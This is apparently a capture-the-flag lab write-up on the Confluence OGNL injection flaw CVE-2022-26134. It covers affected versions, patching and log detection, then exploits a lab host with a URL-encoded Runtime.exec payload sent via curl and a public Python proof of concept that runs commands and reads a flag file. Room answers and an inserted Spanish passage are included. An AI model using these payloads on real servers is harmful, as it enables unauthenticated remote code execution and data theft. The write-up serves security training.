On May the 30th, 2022, an organisation named Volexity identified an un-authenticated RCE vulnerability (scoring 9.8 on NIST) within Atlassian's Confluence Server and Data Center editions.
Confluence is a collaborative documentation and project management framework for teams. Confluence helps track project status by offering a centralised workspace for members.
The following versions of Confluence are vulnerable to this CVE:
1.3.0 -> 7.4.17
7.13.0 -> 7.13.7
7.14.0 -> 7.14.3
7.15.0 -> 7.15.2
7.16.0 -> 7.16.4
7.17.0 -> 7.17.4
7.18.0 -> 7.18.1
You can view the NIST entry for CVE-2022-26134 here.
Confluence es un software de colaboración en equipo. Escrito en Java y utilizado principalmente en entornos corporativos, está desarrollado y comercializado por Atlassian. Confluence se vende tanto como software de uso local como solución de servidor.
Answer the questions below
What is the full CVE entry for this exploit?
CVE-2022-26134
You discover a server running Confluence with the version of 7.16.2, is this vulnerable?
Answer format: yay/nay
yay
Deploy the Vulnerable Machine
Now it is time to practice this vulnerability! Deploy the machine attached to this task, and craft different payloads to answer the questions below.
Note: Please wait for a minimum of seven minutes for this machine to start up before attacking. You can verify the machine is ready for attack once the login page on the following URL loads: HTTP://MACHINE_IP:8090. In the meanwhile, proceed with the rest of the tasks.
Deploy the machine attached to this task by pressing the green button labelled "Start Machine" and proceed with the tasks.
Explaining the Vulnerability
Common Vulnerabilities and Exposures (CVE), this term is given to a publicly disclosed vulnerability
This CVE uses a vulnerability within the OGNL (Object-Graph Navigation Language) expression language for Java (surprise, surprise ... it's Java). OGNL is used for getting and setting properties of Java objects, amongst many other things.
For example, OGNL is used to bind front-end elements such as text boxes to back-end objects and can be used in Java-based web applications such as Confluence. We can see how OGNL is used in the screenshot below. Values are input to a web form, where these values will be stored into objects within the application:
Thanks to Journaldev.com for this example of OGNL in use.
We can abuse the fact that OGNL can be modified; we can create a payload to test and check for exploits.
OGNL (Object-Graph Navigation Language, en español Lenguaje de Navegación de Gráfico de Objeto) es un lenguaje de programación utilizado en la plataforma de desarrollo web Java. OGNL se utiliza a menudo en conjunción con el marco de trabajo de Java para aplicaciones web Struts para permitir la evaluación de expresiones en la vista de la aplicación.
OGNL permite a los desarrolladores crear expresiones que se evalúan en tiempo de ejecución y que pueden acceder y manipular los datos en la aplicación. Esto puede ser útil para personalizar la salida de la aplicación o para permitir la modificación de datos en la aplicación de manera dinámica.
Aquí hay un ejemplo de una expresión OGNL que se utiliza para acceder a una propiedad de un objeto en Java:
Copy code
${user.name}
En este ejemplo, la expresión OGNL accede a la propiedad "name" del objeto "user". Si "user" es un objeto Java que tiene una propiedad "name", la expresión OGNL devolvería el valor de la propiedad "name" del objeto "user".
Answer the questions below
What does the acronym OGNL stand for?
Object-Graph Navigation Language
Exploit Detection and Patching
Patching
Atlassian has released an advisory for their products affected by this CVE, which you can read here. To resolve the issue, you need to upgrade your Confluence version. The suggested list at the time of publication is:
7.4.17
7.13.7
7.14.3
7.15.2
7.16.4
7.17.4
7.18.1
Detection - Log Files
Confluence is an Apache Tomcat server which has logging located in /opt/atlassian/confluence/logs. You can use commands like grep to search for HTTP GET requests of payloads that are using Java runtime to execute commands. For example:
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" in catalina.out
Detection - YARA
If you have Yara installed on the server running Confluence, Volexity (the finders of the vulnerability) has created the following Yara rule for you to use, located here.
Unfamiliar with Yara? Check out our Yara room here.
We can abuse the fact that OGNL can be modified; we can create a payload to test and check for exploits.
In order to exploit this vulnerability within OGNL, we need to make an HTTP GET request and place our payload within the URI. For example, we can instruct the Java runtime to execute a command such as creating a file on the server: ${@java.lang.Runtime@getRuntime().exec("touch /tmp/thm/")}/ .
This will need to be URL encoded, like the following snippet below. You can use this website to help URL encode your payloads (note that your curlpayload will need to end in a trailing / and not $2F):
Creating a temporary file on the server to prove vulnerability
When looking at the server, we can see that it is vulnerable:
Creating a temporary file on the server to prove vulnerability
cmnatic@thm-cve-2022-26134:~$ ls /tmp
hsperfdata_confluence
thm
snap.lxd
Python
There are a few working PoC exploits out there. For this room, I will be demonstrating Samy Younsi (Mwqda)'s PoC written in Python and hosted on GitHub.
Walkthrough (Click to read)
First, we need to download the PoC to our host. I have decided to clone to the repository using git for this room.
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
After navigating to the source code, let's execute the script. Replace "COMMAND" with the command you wish to execute (Remember to use quotation marks when running commands that have special characters and such.)
Download the proof of concept for this task! If you are using the AttackBox, this is already done for you, where it can be found in /root/Rooms/CVE2022-26134.
┌──(kali㉿kali)-[~]
└─$ rustscan -a 10.10.23.227 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.23.227:22
Open 10.10.23.227:8090
Open 10.10.23.227:8091
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-31 21:30 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:30
Completed Parallel DNS resolution of 1 host. at 21:30, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:30
Scanning 10.10.23.227 [3 ports]
Discovered open port 22/tcp on 10.10.23.227
Discovered open port 8090/tcp on 10.10.23.227
Discovered open port 8091/tcp on 10.10.23.227
Completed Connect Scan at 21:30, 0.19s elapsed (3 total ports)
Initiating Service scan at 21:30
Scanning 3 services on 10.10.23.227
Completed Service scan at 21:32, 111.25s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.23.227.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 5.42s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 1.63s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Nmap scan report for 10.10.23.227
Host is up, received user-set (0.19s latency).
Scanned at 2022-12-31 21:30:41 EST for 118s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 feabda8f635162e8cbdf7f8fc93fd6b4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDP796yhsuahdQhu96vFObTCMhw/BFPqNNsAJEZBbJu1hEB3WeahcKYjPHdd/YzvgJpqIMudVMY2fw4Pe0CSzoi8NTxWvaLZitpaHVfPmczFNuo02MgEIUtj140yME0V0Gd51sDsTKVoqm8yzi/8lReHefNWDV5QHV+FxonehC5ug5Sq+5NY1Q5KG/YyMB7lUeX/mRRwQcVDM5Q5DM0/Zm8ZQR5ico5D+3phX6PC0sS3wxwg6cxL0NwhRmoxhojJvLmRzSORYgjkzJxDw571Lr61s9ybIcOlHERRXMmFk56Uw6XtL0et2JyIVPAIS8eImxO4PYtGPvxUCtrc1h50QJfwYv9e3k+1BYaT7iYQkg+VOCc+kbQaVHKDO6QaoE5mk2SRFbcGC/Pv0m7Qkg50KlYNTgod6Qeu1Mup425zULFhfbKJfoaBprePFh4OVj7Ostzps0dsVjNM9euJgBOMU2wPFfvAfJ/ekf3nqVMwkuhVml6DhJouwZkIMquPBYwe0M=
| 256 a420c47e04a3586db8fc1f23bc5a8de1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLqOsk3y3cmtlI1fhH+cGXkiiCm1TYBk01v5rCB9+JlTmov9lU5pVkeZe5rrQvOsI4spXb9/Ljgvp+tscqCHxKM=
| 256 6f94e30e80aa5cac41142ad4f7a2d9ac (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINYSVf24gRFbdZUK/RUMN7VmoSJzzGEqhYnB1UQcCQ0R
8090/tcp open opsmessaging? syn-ack
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 302
| X-ASEN: SEN-L18512764
| X-Confluence-Request-Time: 1672540253027
| Set-Cookie: JSESSIONID=EAEB1C519AC1CE695F35D79AFA1C0F8E; Path=/; HttpOnly
| X-XSS-Protection: 1; mode=block
| X-Content-Type-Options: nosniff
| X-Frame-Options: SAMEORIGIN
| Content-Security-Policy: frame-ancestors 'self'
| Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
| Content-Type: text/html;charset=UTF-8
| Content-Length: 0
| Date: Sun, 01 Jan 2023 02:30:53 GMT
| Connection: close
| HTTPOptions:
| HTTP/1.1 200
| MS-Author-Via: DAV
| Content-Type: text/html;charset=UTF-8
| Content-Length: 0
| Date: Sun, 01 Jan 2023 02:30:53 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1837
| Date: Sun, 01 Jan 2023 02:30:53 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or decept
8091/tcp open jamlink? syn-ack
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 204 No Content
| Server: Aleph/0.4.6
| Date: Sun, 01 Jan 2023 02:31:31 GMT
| Connection: Close
| GetRequest:
| HTTP/1.1 204 No Content
| Server: Aleph/0.4.6
| Date: Sun, 01 Jan 2023 02:30:57 GMT
| Connection: Close
| HTTPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Sun, 01 Jan 2023 02:30:58 GMT
| Connection: Close
| content-length: 0
| Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 414 Request-URI Too Long
| text is empty (possibly HTTP/0.9)
| RTSPRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Sun, 01 Jan 2023 02:30:58 GMT
| Connection: Keep-Alive
| content-length: 0
| SIPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Access-Control-Max-Age: 31536000
| Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
| Server: Aleph/0.4.6
| Date: Sun, 01 Jan 2023 02:31:37 GMT
| Connection: Keep-Alive
| content-length: 0
| TLSSessionReq:
| HTTP/1.1 414 Request-URI Too Long
|_ invalid version format: /
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8090-TCP:V=7.93%I=7%D=12/31%Time=63B0F05D%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,205,"HTTP/1\.1\x20302\x20\r\nX-ASEN:\x20SEN-L18512764\r\nX-Co
SF:nfluence-Request-Time:\x201672540253027\r\nSet-Cookie:\x20JSESSIONID=EA
SF:EB1C519AC1CE695F35D79AFA1C0F8E;\x20Path=/;\x20HttpOnly\r\nX-XSS-Protect
SF:ion:\x201;\x20mode=block\r\nX-Content-Type-Options:\x20nosniff\r\nX-Fra
SF:me-Options:\x20SAMEORIGIN\r\nContent-Security-Policy:\x20frame-ancestor
SF:s\x20'self'\r\nLocation:\x20http://localhost:8090/login\.action\?os_des
SF:tination=%2Findex\.action&permissionViolation=true\r\nContent-Type:\x20
SF:text/html;charset=UTF-8\r\nContent-Length:\x200\r\nDate:\x20Sun,\x2001\
SF:x20Jan\x202023\x2002:30:53\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(H
SF:TTPOptions,97,"HTTP/1\.1\x20200\x20\r\nMS-Author-Via:\x20DAV\r\nContent
SF:-Type:\x20text/html;charset=UTF-8\r\nContent-Length:\x200\r\nDate:\x20S
SF:un,\x2001\x20Jan\x202023\x2002:30:53\x20GMT\r\nConnection:\x20close\r\n
SF:\r\n")%r(RTSPRequest,7C9,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text
SF:/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x2018
SF:37\r\nDate:\x20Sun,\x2001\x20Jan\x202023\x2002:30:53\x20GMT\r\nConnecti
SF:on:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title
SF:>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\
SF:x20type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20
SF:h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1
SF:\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14
SF:px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{hei
SF:ght:1px;background-color:#525D76;border:none;}</style></head><body><h1>
SF:HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1><hr\x20clas
SF:s=\"line\"\x20/><p><b>Type</b>\x20Exception\x20Report</p><p><b>Message<
SF:/b>\x20Invalid\x20character\x20found\x20in\x20the\x20HTTP\x20protocol</
SF:p><p><b>Description</b>\x20The\x20server\x20cannot\x20or\x20will\x20not
SF:\x20process\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x
SF:20perceived\x20to\x20be\x20a\x20client\x20error\x20\(e\.g\.,\x20malform
SF:ed\x20request\x20syntax,\x20invalid\x20request\x20message\x20framing,\x
SF:20or\x20decept");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8091-TCP:V=7.93%I=7%D=12/31%Time=63B0F062%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,68,"HTTP/1\.1\x20204\x20No\x20Content\r\nServer:\x20Aleph/0\.
SF:4\.6\r\nDate:\x20Sun,\x2001\x20Jan\x202023\x2002:30:57\x20GMT\r\nConnec
SF:tion:\x20Close\r\n\r\n")%r(HTTPOptions,EC,"HTTP/1\.1\x20200\x20OK\r\nAc
SF:cess-Control-Allow-Origin:\x20\*\r\nAccess-Control-Max-Age:\x2031536000
SF:\r\nAccess-Control-Allow-Methods:\x20OPTIONS,\x20GET,\x20PUT,\x20POST\r
SF:\nServer:\x20Aleph/0\.4\.6\r\nDate:\x20Sun,\x2001\x20Jan\x202023\x2002:
SF:30:58\x20GMT\r\nConnection:\x20Close\r\ncontent-length:\x200\r\n\r\n")%
SF:r(RTSPRequest,F1,"HTTP/1\.1\x20200\x20OK\r\nAccess-Control-Allow-Origin
SF::\x20\*\r\nAccess-Control-Max-Age:\x2031536000\r\nAccess-Control-Allow-
SF:Methods:\x20OPTIONS,\x20GET,\x20PUT,\x20POST\r\nServer:\x20Aleph/0\.4\.
SF:6\r\nDate:\x20Sun,\x2001\x20Jan\x202023\x2002:30:58\x20GMT\r\nConnectio
SF:n:\x20Keep-Alive\r\ncontent-length:\x200\r\n\r\n")%r(Help,46,"HTTP/1\.1
SF:\x20414\x20Request-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x20\(p
SF:ossibly\x20HTTP/0\.9\)")%r(SSLSessionReq,46,"HTTP/1\.1\x20414\x20Reques
SF:t-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x20\(possibly\x20HTTP/0
SF:\.9\)")%r(TerminalServerCookie,46,"HTTP/1\.1\x20414\x20Request-URI\x20T
SF:oo\x20Long\r\n\r\ntext\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)")%r(
SF:TLSSessionReq,3E,"HTTP/1\.1\x20414\x20Request-URI\x20Too\x20Long\r\n\r\
SF:ninvalid\x20version\x20format:\x20/")%r(Kerberos,46,"HTTP/1\.1\x20414\x
SF:20Request-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x20\(possibly\x
SF:20HTTP/0\.9\)")%r(FourOhFourRequest,68,"HTTP/1\.1\x20204\x20No\x20Conte
SF:nt\r\nServer:\x20Aleph/0\.4\.6\r\nDate:\x20Sun,\x2001\x20Jan\x202023\x2
SF:002:31:31\x20GMT\r\nConnection:\x20Close\r\n\r\n")%r(LPDString,46,"HTTP
SF:/1\.1\x20414\x20Request-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x
SF:20\(possibly\x20HTTP/0\.9\)")%r(LDAPSearchReq,46,"HTTP/1\.1\x20414\x20R
SF:equest-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x20\(possibly\x20H
SF:TTP/0\.9\)")%r(SIPOptions,F1,"HTTP/1\.1\x20200\x20OK\r\nAccess-Control-
SF:Allow-Origin:\x20\*\r\nAccess-Control-Max-Age:\x2031536000\r\nAccess-Co
SF:ntrol-Allow-Methods:\x20OPTIONS,\x20GET,\x20PUT,\x20POST\r\nServer:\x20
SF:Aleph/0\.4\.6\r\nDate:\x20Sun,\x2001\x20Jan\x202023\x2002:31:37\x20GMT\
SF:r\nConnection:\x20Keep-Alive\r\ncontent-length:\x200\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.93 seconds
┌──(kali㉿kali)-[~]
└─$ curl -v http://10.10.23.227:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/
* Trying 10.10.23.227:8090...
* Connected to 10.10.23.227 (10.10.23.227) port 8090 (#0)
> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/ HTTP/1.1
> Host: 10.10.23.227:8090
> User-Agent: curl/7.86.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302
< X-ASEN: SEN-L18512764
< X-Confluence-Request-Time: 1672540525652
< Set-Cookie: JSESSIONID=9C081422598FF899E2CB9BAA7F3CE10E; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fthm%22%29%7D%2Findex.action&permissionViolation=true
< Content-Type: text/html;charset=UTF-8
< Content-Length: 0
< Date: Sun, 01 Jan 2023 02:35:25 GMT
<
* Connection #0 to host 10.10.23.227 left intact
┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 id
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
CVE-2022-26134 - OGNL injection vulnerability
Author: Naqwada
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
Confluence target version: 7.3.5
uid=1002(confluence) gid=1002(confluence) groups=1002(confluence)
┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 "whoami"
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
CVE-2022-26134 - OGNL injection vulnerability
Author: Naqwada
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
Confluence target version: 7.3.5
confluence
┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 "ls"
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
CVE-2022-26134 - OGNL injection vulnerability
Author: Naqwada
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
Confluence target version: 7.3.5
bin boot dev etc flag.txt home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var
┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 "cat flag.txt"
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
CVE-2022-26134 - OGNL injection vulnerability
Author: Naqwada
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
Confluence target version: 7.3.5
THM{OGNL_VULN}
Craft a payload to identify what user the application is running as. What is the user?
confluence
Finally, craft a payload to retrieve the flag stored at /flag.txt on 10.10.23.227. What is the flag?
If your command has spaces, either URL encode it, or use quotes around it.
*THM{OGNL_VULN} *
Conclusion
Nice work!
Hope you enjoyed this brief showcase of the CVE-2022-26134 OGNL Injection vulnerability. Remember, OGNL is an expression language for Java-based web applications, so this vulnerability will also apply to other web apps running the same classes that Confluence uses!
A screenshot displaying two input text fields for the user's name and password on the Confluence login web panel.
A web page with questions and a input text field to the right of each question, displaying how values input into a web form can be stored in the back-end using OGNL
